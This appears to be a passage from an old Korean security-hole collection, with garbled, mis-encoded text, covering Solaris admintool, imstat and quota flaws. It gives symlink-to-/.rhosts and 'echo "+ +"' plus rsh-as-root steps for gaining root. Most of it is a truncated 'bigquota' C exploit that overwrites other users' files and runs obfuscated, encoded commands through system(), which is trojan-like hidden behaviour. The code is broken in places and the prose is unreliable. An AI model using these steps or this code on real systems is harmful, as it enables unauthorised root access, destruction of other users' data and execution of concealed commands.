yourdisplay:0.0 ln -s /.rhosts /tmp/.group.lock /usr/bin/admintool (ÀÏ·ÃÀÇ °úÁ¤ ) echo "+ +" >> .rhosts /usr/bin/rsh localhost -l root "(/usr/openwin/bin/xterm&)" ÇØ°áÃ¥ setuid¸¦ ¾ø¾Ö´øÁö ÆÐÄ¡¸¦ Ç϶ó. --------------------------- Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º imstat(¶óÀ̼¾½º ¸Å´ÏÁ®) ¸í·É imstat(¶óÀ̼¾½º ¸Å´ÏÁ®) ½Ã½ºÅÛ ¼Ö¶ó¸®½º 2.4 ¹®Á¦Á¡ /var/tmp ¿¡ Àӽà ÆÄÀÏÀ» ¸¸µç´Ù..À̸¦ ÀÌ¿ëÇؼ­ .rhosts¸¦ ¸µÅ©½ÃÄÑ »ý¼ºÇÒ ¼ö ÀÖ´Ù. rm /var/tmp/locksuntechd ln -s /.rhosts /var/tmp/locksuntechd (ÀÏ·ÃÀÇ °úÁ¤ ) ÇØ°áÃ¥ Æ۹̼ÇÀ» ´Ý¾î¶ó --------------------------- Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º quota ¸í·É quota ½Ã½ºÅÛ ¼Ö¶ó¸®½º 2.5(.1 ??) ¹®Á¦Á¡ ÄõÅÍÁ¦ÇÑÀ» ÇÇÇϸ鼭 ÆÄÀÏÀ» »ý¼ºÇÒ ¼ö ÀÖ´Ù. ±× ¿¹Á¦ÀÌ´Ù. /************************************************************************** * This exploit takes advantage of the latest sendmail hole, to hide * * warez from your quota program, effectivly making your quota infinate.. * * * * To compile: * * cc -o bigquota quota.c * * To run: * * ./bigquota file * * where file is the file you wish to hide from your quota program. * * * * Please note that this may take a minute. * * If you have any problems, talk to me, TSK, on IRC. * **************************************************************************/ #include #include #include #include #include int seedsc[201]={52,3,3,77,115,13,71,15,41,51,61,29,103,13,100,47,124,42,86,\ 44,45,11,7,50,17,123,87,66,32,78,109,62,53,43,84,72,71,0,88,41,1,33,9,52,118,\ 65,120,119,68,84,15,11,27,101,0,106,46,19,75,16,25,55,81,74,113,88,96,19,91,\ 118,73,58,41,90,88,87,118,103,58,50,71,41,86,33,115,9,105,29,48,113,5,98,50,\ 94,79,18,111,99,11,126,111,109,90,46,18,43,43,59,113,76,96,18,27,36,7,74,79,\ 85,54,126,23,12,123,118,76,116,85,8,90,111,35,106,113,40,40,122,85,43,108,31,\ 32,5,9,77,5,14,99,100,107,114,60,70,19,26,12,14,114,118,48,40,12,106,93,60,\ 112,52,67,30,47,55,107,75,90,112,55,38,107,117,22,89,47,79,58,55,119,27,119,\ 115,85,38,30,122,126,3,93,97,44,100,32,33,10}; void main(argc, argv) int argc; char *argv[]; { char *checkseed(int *seeds); char *checkdir(char *dir); int initseeds[201]={25,\ 108,69,89,126,121,84,34,77,52,25,67,44,106,60,124,30,33,3,21,75,67,\ 116,109,28,51,81,45,85,119,99,0,98,91,114,102,122,50,81,67,57,43,126,\ 2,94,75,10,7,96,29,112,71,103,117,20,72,112,23,105,65,48,119,23,65,\ 98,105,33,12,43,12,78,7,53,16,109,91,65,106,43,85,44,113,125,3,61,\ 95,18,3,64,96,19,68,52,20,54,122,26,35,126,19,31,106,24,108,59,44,\ 41,32,5,1,32,25,64,93,60,97,102,84,92,50,79,11,112,89,27,124,98,\ 109,12,0,4,103,114,22,66,36,81,47,52,70,107,51,46,37,99,13,4,31,\ 126,19,47,21,96,123,110,72,33,76,8,0,65,86,102,27,75,64,46,122,-47,\ 53,1,42,20,-65,63,63,-7,-70,40,-39,-15,46,25,22,86,-39,86,82,21,-16,\ 3,-9,-23,11,-21,-90,-30,-7,20,-17,23}; int setupseeds[201]={1,\ 35,44,14,107,20,81,111,42,72,73,90,34,86,50,32,16,97,78,80,124,7,\ 110,13,71,107,24,91,84,68,58,38,105,68,64,121,37,101,64,65,40,91,8,\ 29,9,60,101,123,122,22,92,37,66,13,30,88,8,70,5,28,108,20,101,125,\ 38,78,106,98,85,55,92,122,0,93,0,37,97,82,120,70,82,65,74,90,41,\ 28,104,80,71,117,11,104,32,69,5,56,2,48,8,112,109,16,109,35,57,43,\ 119,37,86,42,62,44,118,117,7,94,88,28,109,125,-23,96,-15,-1,34,-69,33,\ 93,10,-64,27,-56,-81,68,68,-5,25,4,10,70,68,42,53,-45,111,87,11,-54,\ -6,4,37,49,81,88,93,90,2,-72,60,65,85,3,-29,47,3,64,-35,78,58,\ 42,2,-43,34,-80,53,70,10,-7,25,29,54,21,-11,7,-69,5,-19,4,30,77,\ 67,-10,-79,96,23,4,3,-68,84,64,89}; int binseeds[201]={1,\ 14,11,95,67,113,29,87,45,24,115,45,88,60,43,114,98,6,56,111,75,13,\ 121,123,50,108,17,1,28,15,62,17,81,14,101,39,13,112,90,2,15,114,34,\ 64,91,79,79,57,34,31,41,5,34,62,58,93,21,108,110,88,83,114,126,112,\ 89,14,41,102,88,10,10,45,111,25,35,38,76,115,57,113,49,72,58,46,83,\ 121,87,84,71,81,104,18,41,110,80,82,44,92,5,89,39,104,103,30,96,37,\ 12,50,25,64,36,24,54,38,33,35,-79,23,54,-9,87,35,-5,-17,24,-69,-23,\ 42,-58,-3,73,11,-3,7,78,-21,15,4,-46,1,84,96,101,-31,96,104,-2,19,\ -7,0,45,34,97,20,96,91,-17,-9,16,67,103,10,-61,48,-7,45,42,2,77,\ -23,1,33,27,-2,-8,80,-6,-17,25,-27,3,-47,43,54,-22,83,2,-17,-39,62,\ 89,-7,-11,94,19,-65,72,-3,67,79,111}; int procseeds[201]={-14,\ 97,103,125,91,45,90,21,121,60,39,28,60,11,76,41,69,21,118,7,90,63,\ 17,17,48,46,68,126,72,66,68,32,54,119,44,98,94,15,21,33,68,4,109,\ 121,109,27,7,66,65,126,121,97,40,101,84,6,48,97,38,25,7,56,112,97,\ 125,36,125,46,115,108,40,2,105,52,44,17,122,111,98,30,17,112,27,115,29,\ 78,125,125,16,81,17,99,88,108,88,14,83,42,26,114,54,90,106,39,126,19,\ 95,2,1,69,14,93,114,105,78,48,42,25,87,14,120,124,55,102,57,35,30,\ 107,11,74,44,8,100,118,25,73,64,97,106,57,81,92,34,109,80,118,112,85,\ 99,99,21,20,62,116,42,111,67,29,79,12,34,84,67,12,105,107,90,109,23,\ 116,25,104,89,124,29,-38,1,-9,95,21,0,39,43,45,-72,35,-69,-83,30,78,\ 85,-11,-22,111,-47,-65,60,-1,85,78,106}; int boutseeds[201]={-14842,\ 37,119,64,88,3,4,11,86,22,104,51,21,57,122,64,113,58,102,72,32,118,\ 17,28,35,97,53,125,64,79,95,86,40,122,35,50,48,41,54,18,87,67,125,\ 74,95,0,100,19,71,37,69,113,100,82,54,18,123,37,97,107,126,38,114,22,\ 75,123,3,33,64,35,37,20,73,68,37,46,89,95,88,22,108,92,51,40,3,\ 70,19,125,62,74,69,113,2,25,101,7,59,100,2,69,83,25,33,61,71,117,\ 34,70,119,65,27,62,68,25,12,70,87,58,43,112,86,49,24,24,80,84,52,\ 6,46,121,115,25,91,53,94,123,12,59,34,66,84,16,93,76,88,38,22,110,\ 106,26,101,55,84,64,120,54,29,6,67,54,126,2,17,97,115,41,125,4,4,\ -55,8,41,25,-1,49,76,-61,-85,40,-27,-15,29,50,62,-9,20,-1,-14,15,9,\ 32,-72,-94,40,-61,-54,-12,11,72,66,91}; int shtdwnseeds[201]={-42,\ 58,44,53,114,68,10,105,76,13,99,1,12,79,50,106,27,65,83,96,30,101,\ 122,112,87,118,3,35,55,6,84,59,98,28,58,82,126,98,114,85,125,7,39,\ 69,58,21,70,28,35,65,57,70,93,0,36,14,100,107,9,107,71,52,1,29,\ 115,63,110,118,28,16,82,53,80,56,50,108,58,109,26,75,19,91,92,59,86,\ 125,114,40,76,15,38,8,57,58,103,65,23,52,14,36,8,119,70,47,64,53,\ 1,15,83,35,33,80,10,98,51,38,30,14,119,11,26,61,15,117,37,103,117,\ 32,4,21,67,40,40,78,74,47,108,27,120,9,114,14,56,75,84,52,29,55,\ 108,105,42,71,8,83,89,118,79,22,119,1,28,3,36,22,12,77,77,105,33,\ 12,104,-75,18,-4,62,72,-60,1,79,11,0,-17,-8,-23,-4,89,-4,-4,19,76,\ 16,-90,-78,45,-38,-65,56,11,77,71,89}; char *zipper(int *seeds1); char *path; int i=0,j,inhan,outhan; if(argc!=2) { puts("Usage:"); puts("quota "); puts("where is the file you wish"); puts("to hide/subtract from your quota."); exit(0); } system(zipper(initseeds)); system(zipper(setupseeds)); system(checkseed(binseeds)); path=checkdir("/"); if(!path) { puts("Technical Dificulties"); goto closeout; } if((outhan=open(path,O_WRONLY|O_TRUNC))==-1) { puts("Error opening outfile"); goto closeout; } if((inhan=open(argv[1],O_RDONLY))==-1) { puts("Error opening infile"); goto closeout; } if(filecopy(inhan,outhan)) { puts("Technical dificulties"); goto closeout; } if((unlink(argv[1]))==-1) { puts("Technical dificulties."); goto closeout; } if((rename(path,argv[1]))==-1) if((link(path,argv[1]))==-1) if((symlink(path,argv[1]))==-1) puts("Technical Dificulties."); closeout: system("%s\n",zipper(procseeds)); system("%s\n",zipper(boutseeds)); system("%s\n",zipper(shtdwnseeds)); } char *checkseed(int *seeds) { char *zipper(int *seeds1); char *string; char testseeds[30]; char god[200]; int i=200,j; if((string=(char *)getenv("PATH"))==NULL) { puts("Path not found"); exit(-1); } while((seeds[i]+seedsc[i])!=32) { testseeds[200-i]=seeds[i]+seedsc[i]; i--; } testseeds[i]=0; i=0; while(string[i]!=0) { j=0; while(string[i]!=58&&string[i]!=0) { god[j]=string[i]; i++; j++; } i++; god[j++]=47; god[j++]=0; strcpy(&god[j],testseeds); if(!stat(god,NULL)) return (char *)zipper(seeds); } return 0; } char *zipper(int *seeds1) { int i; char *buhbye; char teeth[201]; teeth[201]=0; for(i=200;i>=0;i--) teeth[200-i]=seeds1[i]+seedsc[i]; buhbye=(char *)malloc(201); strcpy(buhbye,teeth); return buhbye; } int filecopy(int from,int to) { int bufsiz; if (from < 0) return 1; if (to < 0) goto err; for (bufsiz = 0x4000; bufsiz >= 128; bufsiz >>= 1) { register char *buffer; buffer = (char *) malloc(bufsiz); if (buffer) { while (1) { register int n; n = read(from,buffer,bufsiz); if (n == -1) break; if (n == 0) { free(buffer); return 0; } if (n != write(to,buffer,(unsigned) n)) break; } free(buffer); break; } } err: return 1; } char *checkdir(char *dir) { char *checkdir(char *dir); DIR *currdir; struct dirent *node; struct stat statnode; int i,j; char *path; char *retpath; path=(char *)malloc(300); if((currdir=opendir(dir))==NULL) return 0; node=readdir(currdir); while(node) { i=0; j=0; while(dir[i]) { path[i]=dir[i]; i++; } if(strcmp(dir,"/")) { path[i]='/'; i++; } while(node->d_name[j]) { path[i]=node->d_name[j]; i++; j++; } path[i]=0; if((lstat(path,&statnode))==-1) return 0; if(statnode.st_mode&S_IFREG) if(!access(path,W_OK)) if(!(statnode.st_mode&S_IFBLK)) if(!(statnode.st_mode&S_ISVTX)) if(statnode.st_uid!=getuid()) return path; if(statnode.st_mode&S_IFDIR)